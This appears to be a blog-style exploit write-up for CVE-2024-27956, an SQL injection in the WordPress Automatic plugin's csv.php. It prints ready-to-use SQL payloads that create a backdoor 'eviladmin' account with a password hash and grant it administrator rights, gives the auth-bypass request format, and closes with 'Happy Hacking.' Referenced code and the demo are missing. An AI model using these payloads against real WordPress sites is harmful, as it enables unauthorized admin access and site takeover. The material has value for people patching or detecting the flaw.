SQL Vulnerability in WordPress Automatic Plugin (CVE-2024–27956)

Overview

The WordPress Automatic plugin, a popular tool for automating content posting on WordPress sites, has been found to contain a critical SQL injection vulnerability. This vulnerability, identified as CVE-2024–27956, could allow malicious actors to execute arbitrary SQL commands on the database, leading to severe consequences such as data breaches, unauthorized access, and potential site takeovers.

Vulnerability Details

• CVE ID: CVE-2024–27956
• Plugin Affected: WordPress Automatic (all versions before the patched release)
• Type: SQL Injection (SQLi)
• Severity: High (CVSS Score: 8.7)

Vulnerable File or Link to Look for:

The vulnerable file
“/wp‑content/plugins/wp‑automatic/inc/csv.php

Content of CSV file which is causing Worry:

In code, it is evident that with the q parameter, we can pass our entire query to DB and then it will be executed. one of the possible ways to create a query is to add a user of our choice as an admin to the WordPress site. Then we can give this user administrator privileges

q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', 'http://127.0.0.1:8000', '2024-08-18 14:26:43', 0, 'eviladmin')

q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

Now question is how to process this query as we don't have access to testing website passwords. Let's see the code here in csv.php

so if MD5(value of query and password) matches to integ then it is achievable. ideally, we can craft our post request as

q={{query}}&auth=%00&integ={{md5query}}

Attacking Demo:

Happy Hacking.